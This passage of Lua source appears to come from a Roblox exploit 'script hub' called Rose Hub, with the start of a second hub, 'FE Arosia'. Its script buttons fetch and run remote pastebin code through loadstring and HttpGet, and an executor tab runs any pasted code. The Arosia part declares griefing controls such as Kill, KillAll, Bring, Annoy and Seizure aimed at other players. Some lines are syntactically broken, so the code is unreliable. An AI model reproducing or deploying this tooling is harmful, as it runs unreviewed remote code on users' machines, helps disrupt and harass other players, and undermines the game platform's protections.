screenGui.Top.Tabs[tabs[1]].TextBounds.X, 0, 2) underline.Position = UDim2.new(0, 55 - screenGui.Top.Tabs[tabs[1]].TextBounds.X/2, 0, 22) createTextLabel(backColor, 1, 1, Enum.Font.SourceSansBold, "Name", screenGui.Top, UDim2.new(0, 45, 0, 0), UDim2.new(0, 109, 1, 0), "Rose Hub "..VERSION, textColor, 18, true, Enum.TextXAlignment.Left, Enum.TextYAlignment.Center, 1) createTextButton(backColor, 1, 0, Enum.Font.SourceSansBold, "Close", screenGui.Top, UDim2.new(0.898, 0, 0, 0), UDim2.new(0, 36, 0, 31), "X", textColor, 18, 1, function() if tweening == false then tweening = true gui.Main:TweenSize(UDim2.new(0, 361, 0, 31), "Out", "Quad", 0.5) wait(0.5) gui.Main:TweenSize(UDim2.new(0, 0, 0, 31), "Out", "Quad", 0.5) wait(0.5) wait() gui.Open:TweenPosition(UDim2.new(0, 0, 0.75, 0), "Out", "Quad", 0.25) wait(0.25) tweening = false end end) local singleImageButton = Instance.new("ImageButton") singleImageButton.BackgroundColor3 = backColor singleImageButton.BackgroundTransparency = 1 singleImageButton.Image = "rbxassetid://708157521" singleImageButton.Parent = screenGui.Top singleImageButton.Position = UDim2.new(0.033, 0, 0.129, 0) singleImageButton.ScaleType = Enum.ScaleType.Fit singleImageButton.Size = UDim2.new(0, 24, 0, 23) singleImageButton.MouseButton1Down:Connect(function() --Stuff end) --Home Tab createTextLabel(backColor, 1, 1, Enum.Font.SourceSansBold, "Part1", screenGui.Top.Important.HomeTab, UDim2.new(0.024, 0, 0.009, 0), UDim2.new(0, 200, 0, 50), "Welcome to Rose Hub!", textColor, 20, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createTextButton(backColor, 0.75, 0, Enum.Font.SourceSansBold, "Discord", screenGui.Top.Important.HomeTab, UDim2.new(0.024, 0, 0.721, 0), UDim2.new(0, 200, 0, 50), "Discord Server:\nhttps://discord.me/rosehub", textColor, 14, 1, function() end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.HomeTab.Discord, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextLabel(backColor, 1, 0, Enum.Font.SourceSans, "Explanation", screenGui.Top.Important.HomeTab, UDim2.new(0, 0, 0.174, 0), UDim2.new(0, 211, 0, 141), [[To get started click the tabs to find what scripts your looking for. The scrolling bar is invisible so to scroll use your scroll wheel. Want scripts or features added? Join our Discord for Support donations and more!]], textColor, 14, true, Enum.TextXAlignment.Center, Enum.TextYAlignment.Top, 4) --All Script Tabs --Sort lists and insert them for _,list in pairs(lists) do local toSort = {} local sortedList = {} local pos = 0 for _,v in pairs(list[1]) do table.insert(toSort, v[1]) end table.sort(toSort) for i,name in pairs(toSort) do for i,actualTable in pairs(list[1]) do if name == actualTable[1] then table.insert(sortedList, {actualTable[1], actualTable[2], actualTable[3]}) end end end --Make Holding Frame createScrollingFrame(backColor, 0.8, 0, "", UDim2.new(0, 0, 0, 0), "", "Holder", screenGui.Top.Important[list[2].."Tab"], UDim2.new(0, 10, 0, 38), 0, 0, false, UDim2.new(1, -20, 1, -48), "", true) --Function to create the buttons local function createButons(text) pos = 5 for _,button in pairs(sortedList) do if text == "" or string.match(string.lower(button[1]), string.lower(text)) then createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSans, button[1], screenGui.Top.Important[list[2].."Tab"].Holder, UDim2.new(0, 5, 0, pos), UDim2.new(0, 181, 0, 20), button[1], textColor, 14, 1, function() if button[3] == 1 then loadstring(game:HttpGet("https://pastebin.com/raw/"..button[2], true))() elseif button[3] == 2 then loadstring(game:GetObjects("rbxassetid://"..button[2])[1].Source)() end end) pos = pos + 23 end end end --Remove Buttons and create new on search local function removeButtons() for _,button in pairs(screenGui.Top.Important[list[2].."Tab"].Holder:GetChildren()) do button:Destroy() end end --Search Function createTextBox(backColor, mainTrans, 0, Enum.Font.SourceSans, "Search", screenGui.Top.Important[list[2].."Tab"], "Search "..list[2], UDim2.new(0, 10, 0, 10), UDim2.new(1, -20, 0, 22), "", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important[list[2].."Tab"].Search, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) screenGui.Top.Important[list[2].."Tab"].Search.PlaceholderColor3 = textColor screenGui.Top.Important[list[2].."Tab"].Search.PlaceholderText = "Search "..list[2] local function searchBar(chosenList) local search = screenGui.Top.Important[chosenList.."Tab"].Search local currentSearch = "" search.Changed:connect(function(property) if property == "Text" then if search.Text ~= "" and search.Text ~= currentSearch then currentSearch = search.Text removeButtons() createButons(search.Text) elseif search.Text == "" and currentSearch.Text ~= "" then currentSearch = search.Text removeButtons() createButons("") end end end) end searchBar(list[2]) --Create Buttons with no search createButons("") screenGui.Top.Important[list[2].."Tab"].Holder.CanvasSize = UDim2.new(1, 0, 0, pos + 2) end --Executor Tab local movedExec = false local movingText = false local execHolder = createScrollingFrame(backColor, mainTrans, 0, "rbxasset://textures/ui/Scroll/scroll-bottom.png", UDim2.new(0, 0, 0, 0), "rbxasset://textures/ui/Scroll/scroll-middle.png", "Holder", screenGui.Top.Important.ExecutorTab, UDim2.new(0, 10, 0, 10), 0, 10, false, UDim2.new(1, -20, 1, -56), "rbxasset://textures/ui/Scroll/scroll-top.png", true) execHolder.Changed:connect(function(property) if property == "CanvasPosition" then if movingText == false then if execInput.TextBounds.Y - execHolder.CanvasPosition.Y <= 201 then movedExec = false else movedExec = true end end end end) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "execute", screenGui.Top.Important.ExecutorTab, UDim2.new(0, 10, 1, -41), UDim2.new(0, 93, 0, 31), "Execute", textColor, 15, 3, function() pcall(function() loadstring(execInput.Text)() end) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.ExecutorTab.execute, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "clear", screenGui.Top.Important.ExecutorTab, UDim2.new(0, 108, 1, -41), UDim2.new(0, 93, 0, 31), "Clear", textColor, 15, 3, function() execInput.Text = "" end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.ExecutorTab.clear, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) execInput = createTextBox(backColor, 1, 0, Enum.Font.SourceSans, "input", screenGui.Top.Important.ExecutorTab.Holder, "Input script here...", UDim2.new(0, 10, 0, 10), UDim2.new(0, 170, 1, 0), "", textColor, 14, true, Enum.TextXAlignment.Left, Enum.TextYAlignment.Top) execInput.ClearTextOnFocus = false execInput.MultiLine = true execInput.Changed:connect(function(property) if property == "Text" then movingText = true execHolder.CanvasSize = UDim2.new(1, -20, 0, execInput.TextBounds.Y + execInput.TextSize + 10) if movedExec == false and execInput.TextBounds.Y - execHolder.CanvasPosition.Y >= 205 then execHolder.CanvasPosition = Vector2.new(0, execInput.TextBounds.Y + 224 + execInput.TextSize + 10) movedExec = false elseif movedExec == true and execInput.TextBounds.Y < 224 then movedExec = false end movingText = false end end) --Settings createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "colorpickopen", screenGui.Top.Important.SettingsTab, UDim2.new(0, 10, 0, 10), UDim2.new(0, 93, 0, 31), "Color Picker", textColor, 15, 3, function() if colorPickerOpen == false then colorPickerOpen = true if rainbow == true then rainbow = false rainbowReset = true end if pickerCreated ~= true then ColorPicker.new() else pickerGui.Visible = true end end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.colorpickopen, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "ResetGui", screenGui.Top.Important.SettingsTab, UDim2.new(0, 108, 0, 10), UDim2.new(0, 93, 0, 31), "Reset Gui", textColor, 15, 3, function() rainbowReset = true rainbow = false rainbowCount = 75 changeColorPickerBack = true backDrop.BackgroundColor3 = Color3.fromRGB(59, 59, 59) updateBack(Color3.fromRGB(59, 59, 59)) savedColor = Color3.fromRGB(59, 59, 59) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.ResetGui, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createFrame(false, backColor, mainTrans, 0, false, "RainbowFrame", screenGui.Top.Important.SettingsTab, UDim2.new(0, 10, 0, 46), UDim2.new(1, -20, 0, 111)) createTextLabel(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "SpeedLabel", screenGui.Top.Important.SettingsTab.RainbowFrame, UDim2.new(0, 10, 0, 46), UDim2.new(0, 90, 0, 25), "Speed: "..tostring(rainbowCount), textColor, 15, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.SpeedLabel, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "RainbowSet", screenGui.Top.Important.SettingsTab.RainbowFrame, UDim2.new(0, 135, 0, 46), UDim2.new(0, 44, 0, 25), "Set", textColor, 15, 3, function() local speed = screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowBox.Text if tonumber(speed) and tonumber(speed) >= 1 then rainbowCount = tonumber(speed) screenGui.Top.Important.SettingsTab.RainbowFrame.SpeedLabel.Text = "Speed: "..tostring(speed) end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowSet, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextBox(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "RainbowBox", screenGui.Top.Important.SettingsTab.RainbowFrame, "", UDim2.new(0, 105, 0, 46), UDim2.new(0, 25, 0, 25), tostring(rainbowCount), textColor, 15, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, true) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowBox, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextLabel(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "RainbowLabel", screenGui.Top.Important.SettingsTab.RainbowFrame, UDim2.new(0, 10, 0, 10), UDim2.new(0, 170, 0, 31), "Rainbow Background", textColor, 15, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowLabel, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "RainbowOn", screenGui.Top.Important.SettingsTab.RainbowFrame, UDim2.new(0, 10, 0, 76), UDim2.new(0, 83, 0, 25), "Enabled", textColor, 15, 3, function() if rainbow == false and colorPickerOpen == false then customRainbow = true rainbow = true rainbowReset = false end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowOn, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "RainbowOff", screenGui.Top.Important.SettingsTab.RainbowFrame, UDim2.new(0, 98, 0, 76), UDim2.new(0, 83, 0, 25), "Disabled", textColor, 15, 3, function() if rainbow == true and colorPickerOpen == false then rainbow = false rainbowReset = true end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.RainbowFrame.RainbowOff, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextLabel(backColor, mainTrans, 0, Enum.Font.SourceSans, "ColorPickerBackgroundChangeLabel", screenGui.Top.Important.SettingsTab, UDim2.new(0, 10,0, 162), UDim2.new(1, -20, 0, 31), "Change Color Picker Background", textColor, 15, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.ColorPickerBackgroundChangeLabel, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "PickerBackgroundOn", screenGui.Top.Important.SettingsTab, UDim2.new(0, 10, 0, 198), UDim2.new(0, 93, 0, 25), "Enabled", textColor, 15, 1, function() if changeColorPickerBack == false then changeColorPickerBack = true end end) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "PickerBackgroundOff", screenGui.Top.Important.SettingsTab, UDim2.new(0, 108, 0, 198), UDim2.new(0, 93, 0, 25), "Disabled", textColor, 15, 1, function() if changeColorPickerBack == true then changeColorPickerBack = false end end) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "SaveSettings", screenGui.Top.Important.SettingsTab, UDim2.new(0, 10, 0, 228), UDim2.new(1, -20, 0, 31), "Save Settings", textColor, 15, 3, function() if savingSettings == false then savingSettings = true if writefile then local back = colorPickerBack if backDrop then back = backDrop.BackgroundColor3 end saveSetting(savedColor, back, changeColorPickerBack, mainTrans, rainbow, rainbowCount) screenGui.Top.Important.SettingsTab.SaveSettings.Text = "Settings Saved!" wait(1) else screenGui.Top.Important.SettingsTab.SaveSettings.Text = "Exploit not Supported :(" wait(1) end screenGui.Top.Important.SettingsTab.SaveSettings.Text = "Save Settings" savingSettings = false end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.SettingsTab.SaveSettings, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) --Credits createTextLabel(backColor, 1, 1, Enum.Font.Highway, "CreditsTxt", screenGui.Top.Important.CreditsTab, UDim2.new(0, 0, 0, 0), UDim2.new(1, 0, 1, 0), [[Humanoid Humanoid#1337 Zwolf Zwolf#3762 Alex Alex the Great#9740 Tom tomisapussycat#0409 Moon Moon#6245]], textColor, 20, true, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) --Script Search createTextLabel(backColor, 1, 0, Enum.Font.SourceSansBold, "Sad", screenGui.Top.Important.ScriptSearchTab, UDim2.new(0, 0, 0, 0), UDim2.new(1, 0, 1, 0), "Soon to Come", textColor, 15, true, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) --Audios Tab local volume = 1 local audioPage = 1 local function stopSounds() for _,obj in pairs(lighting:GetChildren()) do if obj:IsA("Sound") then obj:Destroy() end end for _,obj in pairs(mWorkspace:GetChildren()) do if obj:IsA("Sound") then obj:Destroy() end end end local function playSong(id) stopSounds() local sound = Instance.new("Sound") sound.Parent = lighting sound.SoundId = "rbxassetid://"..tostring(id) sound.Volume = volume sound.Name = "RoseHubSound" sound.Looped = true sound.Playing = true end local audioHolder = createScrollingFrame(backColor, 0.8, 0, "", UDim2.new(0, 0, 0, 0), "", "Holder", screenGui.Top.Important.AudiosTab, UDim2.new(0, 10, 0, 96), 0, 0, false, UDim2.new(1, -20, 0, 145), "", true) local audioInputBox = createTextBox(backColor, mainTrans, 0, Enum.Font.SourceSans, "audioinput", screenGui.Top.Important.AudiosTab, "Search Audios", UDim2.new(0, 10, 0, 10), UDim2.new(0, 140, 0, 25), "", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center) audioInputBox.PlaceholderColor3 = textColor createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.audioinput, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "Stop", screenGui.Top.Important.AudiosTab, UDim2.new(0, 10, 0, 38), UDim2.new(0, 62, 0, 25), "Stop", textColor, 15, 1, function() stopSounds() end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.Stop, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) local volumeBox = createTextBox(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "VolumeBox", screenGui.Top.Important.AudiosTab, "Volume", UDim2.new(0, 75, 0, 38), UDim2.new(0, 61, 0, 25), "Volume", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.VolumeBox, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "Set", screenGui.Top.Important.AudiosTab, UDim2.new(0, 139, 0, 38), UDim2.new(0, 62, 0, 25), "Set", textColor, 15, 1, function() if tonumber(volumeBox.Text) then volume = tonumber(volumeBox.Text) pcall(function() lighting.RoseHubSound.Volume = volume end) end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.Set, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) local currentSong = createTextLabel(backColor, mainTrans, 0, Enum.Font.SourceSans, "CurrentSong", screenGui.Top.Important.AudiosTab, UDim2.new(0, 10, 0, 66), UDim2.new(1, -20, 0, 25), "Current Song", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.CurrentSong, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "PreviousPage", screenGui.Top.Important.AudiosTab, UDim2.new(0, 10, 0, 246), UDim2.new(0, 94, 0, 25), "Previous Page", textColor, 15, 1, function() if audioPage > 1 then audioPage = audioPage - 1 createAudios(audioPage) end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.PreviousPage, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "NextPage", screenGui.Top.Important.AudiosTab, UDim2.new(0, 107, 0, 246), UDim2.new(0, 94, 0, 25), "Next Page", textColor, 15, 1, function() audioPage = audioPage + 1 createAudios(audioPage) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.NextPage, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) function createAudios(audioPage) local audioKeyword = audioInputBox.Text local json = "https://search.roblox.com/catalog/json?Category=Audio&Keyword="..audioKeyword.."&ResultsPerPage=25&PageNumber="..tostring(audioPage) local gotJson = game:HttpGet(json, true) local rawResult = httpService:JSONDecode(gotJson) local pos = 5 for _,button in pairs(audioHolder:GetChildren()) do button:Destroy() end for _,tab in pairs(rawResult) do local scale = false local button = createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSans, tab.Name, screenGui.Top.Important.AudiosTab.Holder, UDim2.new(0, 5, 0, pos), UDim2.new(0, 181, 0, 20), tab.Name, textColor, 14, 1, function() playSong(tab.AssetId) currentSong.Text = tab.Name currentSong.TextScaled = scale end) if button.TextBounds.X > button.Size.X.Offset then button.TextScaled = true scale = true end pos = pos + 23 end audioHolder.CanvasSize = UDim2.new(0, 0, 0, pos + 2) end createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "search", screenGui.Top.Important.AudiosTab, UDim2.new(0, 153, 0, 10), UDim2.new(0, 48, 0, 25), "Search", textColor, 15, 3, function() createAudios(1) end) --Remove pcall pcall(function() createAudios(1) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.AudiosTab.search, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) --Decals Tab local decalsPage = 1 local decalsHolder = createScrollingFrame(backColor, 0.8, 0, "", UDim2.new(0, 0, 0, 0), "", "Holder", screenGui.Top.Important.DecalsTab, UDim2.new(0, 10, 0, 68), 0, 0, false, UDim2.new(1, -20, 0, 173), "", true) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "search", screenGui.Top.Important.DecalsTab, UDim2.new(0, 153, 0, 10), UDim2.new(0, 48, 0, 25), "Search", textColor, 15, 3, function() createDecals(decalsPage) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.DecalsTab.search, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) local decalInput = createTextBox(backColor, mainTrans, 0, Enum.Font.SourceSans, "decalinput", screenGui.Top.Important.DecalsTab, "Search Decals", UDim2.new(0, 10, 0, 10), UDim2.new(0, 140, 0, 25), "", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center) decalInput.PlaceholderColor3 = textColor createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.DecalsTab.decalinput, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) local selectedDecal = createTextLabel(backColor, mainTrans, 0, Enum.Font.SourceSans, "SelectedDecal", screenGui.Top.Important.DecalsTab, UDim2.new(0, 10, 0, 38), UDim2.new(1, -20, 0, 25), "Selected Decal", textColor, 14, false, Enum.TextXAlignment.Center, Enum.TextYAlignment.Center, 1) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.DecalsTab.SelectedDecal, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "PreviousPage", screenGui.Top.Important.DecalsTab, UDim2.new(0, 10, 0, 246), UDim2.new(0, 94, 0, 25), "Previous Page", textColor, 15, 1, function() if decalsPage > 1 then decalsPage = decalsPage - 1 createDecals(decalsPage) end end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.DecalsTab.PreviousPage, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createTextButton(backColor, mainTrans, 0, Enum.Font.SourceSansBold, "NextPage", screenGui.Top.Important.DecalsTab, UDim2.new(0, 107, 0, 246), UDim2.new(0, 94, 0, 25), "Next Page", textColor, 15, 1, function() decalsPage = decalsPage + 1 createDecals(decalsPage) end) createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top.Important.DecalsTab.NextPage, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) function createDecals(decalsPage) local decalsKeyword = decalInput.Text local json = "https://search.roblox.com/catalog/json?Category=Decals&Keyword="..decalsKeyword.."&ResultsPerPage=50&PageNumber="..tostring(decalsPage) local gotJson = game:HttpGet(json, true) local rawResult = httpService:JSONDecode(gotJson) local xPos = 5 local yPos = 5 local ran = 0 for _,button in pairs(decalsHolder:GetChildren()) do button:Destroy() end for _,tab in pairs(rawResult) do local singleImageButton = Instance.new("ImageButton") singleImageButton.BackgroundColor3 = backColor singleImageButton.BackgroundTransparency = 1 singleImageButton.BorderSizePixel = 0 singleImageButton.Image = "https://www.roblox.com/Thumbs/Asset.ashx?width=420&height=420&assetId="..tostring(tab.AssetId) singleImageButton.Parent = screenGui.Top.Important.DecalsTab.Holder singleImageButton.Position = UDim2.new(0, xPos, 0, yPos) singleImageButton.ScaleType = Enum.ScaleType.Fit singleImageButton.Size = UDim2.new(0, 89, 0, 89) singleImageButton.MouseButton1Down:Connect(function() local image = Instance.new("ImageLabel") image.Parent = coreGui image.Name = "DecalLoader" local returnVal = nil for i=1, 10 do local test = pcall(function() image.Image = "rbxassetid://"tostring(tab.AssetId) end) if test then returnVal = i break end end if returnVal ~= nil then selectedDecal.Text = tostring(tab.AssetId - returnVal) end end) ran = ran + 1 xPos = xPos + 92 if ran == 2 then ran = 0 xPos = 5 yPos = yPos + 92 end end decalsHolder.CanvasSize = UDim2.new(0, 0, 0, yPos + 2) end pcall(function() createDecals(1) end) --Final Stuff createImageLabel(1, "rbxasset://textures/ui/TopBar/dropshadow.png", "TopBarShadow", screenGui.Top, UDim2.new(0, 0, 1, 0), false, UDim2.new(1, 0, 0, 3), 4) createFrame(false, backColor, 0, 0, false, "Frame", screenGui.Top, UDim2.new(0, 155, 0.194, 0), UDim2.new(0, 1, 0, 21)) createFrame(false, backColor, 1, 0, true, "CurrentTab", screenGui.Top, UDim2.new(0, 165, 0, 0), UDim2.new(0, 109, 0, 31)) createTextLabel(backColor, 1, 1, Enum.Font.SourceSansBold, "Label", screenGui.Top.CurrentTab, UDim2.new(0, 0, 0, 0), UDim2.new(0, 109, 0, 31), tabs[1], textColor, 18, true, Enum.TextXAlignment.Left, Enum.TextYAlignment.Center, 1) updateBack(savedColor) if enableRainbow == true then customRainbow = true rainbow = true end gui.Main.Size = UDim2.new(0, 0, 0, 31) gui.Open.Position = UDim2.new(0, -75, 0.75, 0) wait(3) intro.Intro:TweenSize(UDim2.new(0, 376, 0, 25), "Out", "Quad", 0.5) wait(0.5) intro.Intro:TweenSize(UDim2.new(0, 0, 0, 25), "Out", "Quad", 0.5) wait(0.5) intro:Destroy() gui.Enabled = true gui.Open:TweenPosition(UDim2.new(0, 0, 0.75, 0), "Out", "Quad", 0.5) wait(0.5) tweening = false print("Rose Hub process finished at " .. round(tick()-start) .. " milliseconds.") end) fearosia.Name = "fearosia" fearosia.Parent = Main fearosia.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) fearosia.Position = UDim2.new(0.63564837, 0, 0.798755705, 0) fearosia.Size = UDim2.new(0, 156, 0, 21) fearosia.Font = Enum.Font.SourceSans fearosia.Text = "FE Arosia" fearosia.TextColor3 = Color3.new(0, 0, 0) fearosia.TextSize = 28 fearosia.MouseButton1Down:connect(function() -- Thank you for using Arosia, enjoy! -- Objects local Arosia = Instance.new("ScreenGui") local SideTabsBrick = Instance.new("Frame") local icon = Instance.new("ImageLabel") local MainFrame = Instance.new("Frame") local TopRow = Instance.new("Frame") local Title = Instance.new("TextLabel") local CloseGUI = Instance.new("TextButton") local FE_Check = Instance.new("TextLabel") local SideTabs = Instance.new("Frame") local TAB_LocalPlayer = Instance.new("TextButton") local TAB_Others = Instance.new("TextButton") local TAB_Scripts = Instance.new("TextButton") local TAB_Credit = Instance.new("TextButton") local TAB_Games = Instance.new("TextButton") local Others = Instance.new("Frame") local PlayerUserEnter = Instance.new("TextBox") local Guidance = Instance.new("TextLabel") local Annoy = Instance.new("TextButton") local Teleport = Instance.new("TextButton") local View = Instance.new("TextButton") local Kill = Instance.new("TextButton") local Attach = Instance.new("TextButton") local Bring = Instance.new("TextButton") local Guidance2 = Instance.new("TextLabel") local NoneSelected = Instance.new("Frame") local NoneSelectedText1 = Instance.new("TextLabel") local NoneSelectedText2 = Instance.new("TextLabel") local NoneSelectedText3 = Instance.new("TextLabel") local LocalPlayer = Instance.new("Frame") local GodMode = Instance.new("TextButton") local Fly = Instance.new("TextButton") local Speed = Instance.new("TextButton") local Speed_TXTBOX = Instance.new("TextBox") local JumpHeight = Instance.new("TextButton") local JumpHeight_TXTBOX = Instance.new("TextBox") local Chat = Instance.new("TextButton") local Chat_TXTBOX = Instance.new("TextBox") local Respawn = Instance.new("TextButton") local HipHeight = Instance.new("TextButton") local HipHeight_TXTBOX = Instance.new("TextBox") local Noclip = Instance.new("TextButton") local Sit = Instance.new("TextButton") local Jump = Instance.new("TextButton") local HideName = Instance.new("TextButton") local Spam = Instance.new("TextButton") local Freeze = Instance.new("TextButton") local Btools = Instance.new("TextButton") local Spin = Instance.new("TextButton") local NoLimbs = Instance.new("TextButton") local Seizure = Instance.new("TextButton") local Games = Instance.new("Frame") local Scripts = Instance.new("Frame") local SideFrame = Instance.new("Frame") local SIDE_Title = Instance.new("TextLabel") local OpenGUI = Instance.new("TextButton") local SIDE_FE_Check = Instance.new("TextLabel") local getimage = game:GetService('ContentProvider') local ResetDefault = Instance.new("TextButton") local Push = Instance.new("TextButton") local ClientFreeze = Instance.new("TextButton") local Orbit = Instance.new("TextButton") local BringAll = Instance.new("TextButton") local AttachAll = Instance.new("TextButton") local Flatten = Instance.new("TextButton") local Guidance3 = Instance.new("TextLabel") local KillAll = Instance.new("TextButton") local Energize = Instance.new("TextButton") local GlitchMax = Instance.new("TextButton") local Energize_TXT = Instance.new("TextLabel") local GlitchMax_TXT = Instance.new("TextLabel") local Verspin = Instance.new("TextButton") local Verspin_TXT = Instance.new("TextLabel") local Temp = Instance.new("TextLabel") local Experimental = Instance.new("TextButton") local CHAOS = Instance.new("TextButton") -- Properties Arosia.Name = "Arosia" Arosia.Parent = game:GetService("CoreGui") MainFrame.Name = "MainFrame" MainFrame.Parent = Arosia MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 